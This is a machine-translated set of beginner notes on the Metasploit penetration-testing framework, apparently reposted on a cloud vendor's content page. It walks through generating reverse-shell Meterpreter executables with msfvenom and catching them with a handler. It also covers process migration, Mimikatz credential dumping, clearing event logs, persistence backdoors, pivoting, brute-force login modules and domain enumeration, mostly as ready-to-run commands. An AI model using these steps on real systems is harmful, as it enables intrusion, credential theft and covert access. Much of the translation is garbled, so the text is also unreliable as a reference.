Metasploit Quick Start

Source: Internet
Author: User
Tags mssql snmp


No work today, in the dark room to read a 100-page book "Metasploit Novice Guide", here to share notes to everyone. You are welcome to criticize and learn to make progress together.


 Metasploit Beginner's Guide


笔记kali



0x01
The Metapoit basic file structure is as follows:


Config Metasploit environment configuration information, database configuration information
Data penetration module of some tools and payload, third-party gadget collection, user dictionary and other information
DB Rails compilation generates database information for MSF web framework
Documentation User Description documentation and development documentation
Some basic expansion modules of External Metasploit
Libs Metasploit Some basic classes and third-party module classes
Log Metasploit Some system information and other information at runtime
Modules Metasploit System tool modules, including pre-auxiliary modules (auxiliary), penetration modules (exploits), attack loads (payloads) and rear penetration modules (posts), And an empty field module (Nops) and an encoding module (Encode RS)
Msfinscan to bin file offset address scan
Msfconsole Metasploit's basic command line integrates various functions.
Msfelfscan to the Linux elf file to move the address to scan

Msfmachscan function with Msfelfscan
Msfpescan scans the PE format file offset address for Windows.
Msfvenom integrates features of Msfpayload and Msfencode, and is more efficient instead of MSF payload and Msfencode
Plugins Metasploit's third-party plug-in interface.
Scripts Metasploit common post-infiltration module, the difference between the data and the post-infiltration module, do not need to add post parameters and absolute path, can be directly run.


0x02
Search parameters
You can search for your Metasploit. Use the module
Use parameter:
You want to use a payload, or a module that uses the use parameter.
Show Options Parameters
He can see the use of module setup information
Info parameter:
He can see all the detailed information about the module
Set parameters:
He is setting the basic targets option, such as set Target 1
Set Session 1
Back parameter:
If you want to re-select a new use module, you will return with back.
Exit Parameters:
Exit and back, one is return, one is exit
Kill parameter:
Kill a process.



0x03
Scanning phase in order to easily view the results of the scan, you need to open the PostgreSQL database.
Search Portscanner
Use &&
Show Optionns
Run



0x04
Generator Msfvenom
[Email protected]:~# msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.105.1 lport=8099-f exe >shell.exe



0x05
Msfvenom encoding Generation
HTTPS load breaks firewall settings
Payload inject injection load (equivalent to adding another payload to the original session ID to return a new painting ID)
Auto RDP Port Automation open 3389 can also open any port
Inject in memory injection RAM



0x06
Android payload Generation



0x07
Cobaltstrike
A Metasploit-based GUI for the framework of the penetration tool.



0X08 
Meterpreter command is divided into:  
1, Core command  
2, stdapi file directive  
3. STDAPI network instruction  
4, Stdapi user interface Directive  
5, STDAPI web Cam command  
6, Stdapi file System command  
7, Priv Power command  
8, priv Password Database command  
9, priv Timestamp command  
attack win7. 

[email protected]:/var/www/ html# msfvenom-p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=6745-f exe >win.exe 
No Platform was selected, choosing Msf::module::P latform::windows from the payload 
No Arch selected, selecting arch : x86 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size:502 bytes& nbsp
Final size of exe file:73802 bytes 
2



MSF > Use Multi/handler
MSF exploit (handler) > Set Payload Windows/meterpreter/reverse_https
Payload = Windows/meterpreter/reverse_https
MSF exploit (handler) > Set Lhost 192.168.105.1
Set Lport 6745
Sessions
Sessions-i 1



Migrate command
Migrating a process from a target machine to another process
Meterpreter > Getpid
Current pid:3232
Meterpreter > Run post/windows/manage/migrate



[] Running module against PC-20170804GGMB
[
] Current server Process:win.exe (3232)
[*] Spawning Notepad.exe process to migrate
[+] migrating to 3356
[+] Successfully migrated to process 3356



Script command: RUM_CHECKMV Check whether the remote host is a virtual machine or a real host.
Run Getgui Add user's command
Run VNC look at each other's desktop
Run Packetrecorder-i 0 To view all traffic for the target system and to record the packet.
Load Mimikatz
Clearev clearing the event log



0x09
One: Get Meterpreter.
1 Mr. First into an executable file
[Email protected]:~# msfvenom-p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=8934-f exe > She.exe


  1. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  2. No Arch selected, selecting Arch: x86 from the payload
  3. No encoder or badchars specified, outputting raw payload
  4. Payload size: 543 bytes
  5. Final size of exe file: 73802 bytes```
  6. msf > **use multi/handler**
  7. msf exploit(handler) > **set payload windows/meterpreter/reverse_https**
  8. payload => windows/meterpreter/reverse_https
  9. msf exploit(handler) > **set LHOST 192.168.1.105**
  10. LHOST => 192.168.1.105
  11. msf exploit(handler) > **set LPORT 8934**
  12. LPORT => 8934
  13. msf exploit(handler) > **set SessionCommunicationTimeout 0**
  14. SessionCommunicationTimeout => 0
  15. msf exploit(handler) > **set exit0nsession false**
  16. exit0nsession => false
  17. msf exploit(handler) > **exploit -j**
  18. ---
  19. 二。Meterpreter基本隧道代理
  20. portfwd是meterpreter提供的一种基本端口转发,portfwd可以反弹单个端口到本地,并且监听。
  21. pivot是meterpreter的最常用的一种代理,可以轻松把你的机器代理到受害者内网环境下面介绍下pivot使用方法route add添加临时路由表。使用方法:route add添加临时路由表。
  22. 在metasploit添加一个路由表,目的是访问10.1.1.129,将通过meterpreter的会话1来访问。
  23. meterpreter>route
  24. meterpreter>run get_local_subnets 查看路由段
  25. 10.1.1.129 255.255.255.255 1 我们的路由标段是这个
  26. Ms exploit(handler)>route add 10.1.1.129 255.255.255.255 1添加路由至本地
  27. route print
  28. ===============================
  29. subnet netmask gateway
  30. 10.1.1.129 255.255.255.255 session 1


If you want to proxy 10.1.1.129/24 to session 1, you can write this.
Pivot has been configured here, you scan the 10.1.1.129 in MSF (DB_NMAP) or Access (Psexe module, SSH module) will be accessed through the proxy session 1 This reply, if you want to use this agent through other applications, what to do? With Metasploit socks4a, you can provide an I-listen tunnel for other applications to access.



First use sockes4a and configure, listen port
MSF > Use AUXILIARY/SERVER/SOCKS4A
MSF auxiliary (SOCKS4A) > Show options



Module Options (AUXILIARY/SERVER/SOCKS4A):



Name Current Setting Required Description
---- --------------- -------- -----------
Srvhost 0.0.0.0 yes the address to listen on
Srvport yes the port to listen on.



Auxiliary action:



Name Description
---- -----------
Proxy



MSF auxiliary (SOCKS4A) > Exploit-y
[] Auxiliary module execution completed
MSF auxiliary (SOCKS4A) >
[
] Starting the SOCKS4A proxy server



To view the listening port:
MSF auxiliary (SOCKS4A) > Netstat-ano | grep "1080"
[*] Exec:netstat-ano | grep "1080"



TCP 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)



Port is already listening, then configure Proxychains



0x10
Rights maintenance. Metasploit back door is not easy to use, we recommend to take control of access to the external third-party backdoor.
An MSF comes with a backdoor.
Persistence
Metsvc
Scheduleme & Schtasks



0x11
Information gathering
To be good at gathering information and to have a good view of the results, then we have to do the following three steps to start Msfconsole: Start the database; view the database; link the database.


Port Scan: Search Portscan
Currently two scan modes: SYN/TCP

Smb_version to identify the version of Windows
Use Auxiliary/scanner/smb/smb_version

Mssql_ping default MSSQL will listen to 1433 port or a random TCP port, if listening to a random port, you can use UDP on the 1433 port to query specifically which port is listening.
Use auxiliary/scanner/mssql/mssql_ping

Ssh_version identifying the SSH software version
Auxiliary/scanner/ssh/ssh_version

Ftp_version looking for FTP server in Target network

Brute Force hack

Kali with a dictionary path
/usr/share/metasploit-framework/data/wordlists


Auxiliary/scanner/mysql/mysql_login
Auxiliary/scanner/http/tomcat_mgr_login


Assuming that the Tomcat account password is successfully exploded, the following shell can be taken:
Exploit/multi/http/tomcat_mgr_deploy


Metasploit Common probing Service module:


* * Port Scan * *

Auxiliary/scanner/portscan
Scanner/portscan/ack
Scanner/portscan/ftpbounce FTP Hop port scan
Scanner/portscan/syn
Scanner/portscan/tcp
Scanner/portscan/xmss TCP "XMSS" Port scan

SMB Scan

Auxiliary/scanner/smb/smb_enumusers SMB Enumeration
Auxiliary/scanner/smb/pipe_dcerpc_auditor return DCERPC Information
AUXILIARY/SCANNER/SMB/SMB2 Scan SMB2 Protocol
Auxiliary/scanner/smb/smb_enumshares scanning SMB shared files
Auxiliary/scanner/smb/smb_enumusers enumerating users on the system
Auxiliary/scanner/smb/smb_login SMB Logon
Use windows/smb/psexec SMB Login
Auxiliary/scanner/smb/smb_lookupsid users of the scan group
Auxiliary/scanner/smb/smb_version Scan System version

MSSQL Scan


Admin/mssql/mssql_enum MSSQL Enumeration
Admin/mssql/mssql_exec MSSQL Executive Order
Admin/mssql/mssql_sql MSSQL Query
Scanner/mssql/mssql_login MSSQL Login Tool
There's also a mssql_payload module


SMTP Scan

Auxiliary/scanner/smtp/smtp_enum SMTP Enumeration
Auxiliary/scanner/smtp/smtp_version Scanning SMTP versions

SNMP Scan

Auxiliary/scanner/snmap/community through SNMP scanning devices
Scanner/snmap/community SNMP Scan

SSH scan

Auxiliary/scanner/ssh/ssh_login SSH Login
Auxiliary/scanner/ssh/ssh_login_pubkey SSH Public key authentication Login
Auxiliary/scanner/ssh/ssh_version Scan SSH version test

Telnet scan

Auxiliary/scanner/telnet/telnet_login Telnet Login
Auxiliary/scanner/telnet/telnet_version Telnet version

TFTP scan

Auxiliary/scanner/tftp/tftpbrute Scanning TFTP files
Scanner/ftp/anonymous FTP version Scan

ARP Scan


Auxiliary/scanner/discovery/arp_sweep
Auxiliary/scanner/discovery/udp_prode Scanning UDP Service Host
Auxiliary/scanner/discovery/udp_sweep detection of commonly used UDP services
Auxiliary/sniffer/psnuffle Sniffer password



Scanner/vnc/vnc_none_auth VNC Service No authentication scan module


Web server information Scanning module

Auxiliary/scanner/http below the http_version,open_proxy,robots_txt,frontpage_login,tomcat_administration,tomcat_utf8_ Traversal,options,drupal_views_user_enum,scraper,svn_scanner,trace,vhost_scanner,webdav_internal_ip,webdav_ Scanner,webdav_website_content

File directory Scan Module

auxiliary/scanner/http/under the Backup_file,brute_dirs,copy_of_file,dir_listing,dir_scanner,dir_webdav_unicode_bypass , File_sanme_dir,files_dir,http_put,ms09_020_webdav_unicode_bypass,prev_dir_same_name_file,replace_ext,soap_xml , Trace_axd,verb__auth_bypass


Auxiliary/scanner/dos/http/apache_range_dos


Web Application Scan Module

Auxiliary/scanner/http/blind_sql_query
Auxiliary/scanner/http/error_sql_injection
Auxiliary/scanner/http/http_tracersal
Auxiliary/scanner/http/rails_mass_assignment
Exploit/multi/http/lcms_php_exec


0x12
Bounce Meterpreter
Try to claim 2012 servers
Try current account bypass right

NET User/domain
NET group "domain Computer"/domain
NET Group "Domain Admins"/domain View Domain Admins
net localgroup Administrators
NET View/domain
Information analysis get one server permission
Mimikaz fetching plaintext
View details of crawled users net user Xxx/domain



Attempt to use domain token impersonation
Leveraging SMB Delivery
1 Use the currently acquired two user rights to quickly scan
2smb_login Scan
3 Port forwarding into intranet
4meterpreter Port Forwarding
SOCKS4A Forwarding of 5MSF


+https://www.zybuluo.com/jasun/note/841229 good, I want to eat, hungry,.


Metasploit Quick Start


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.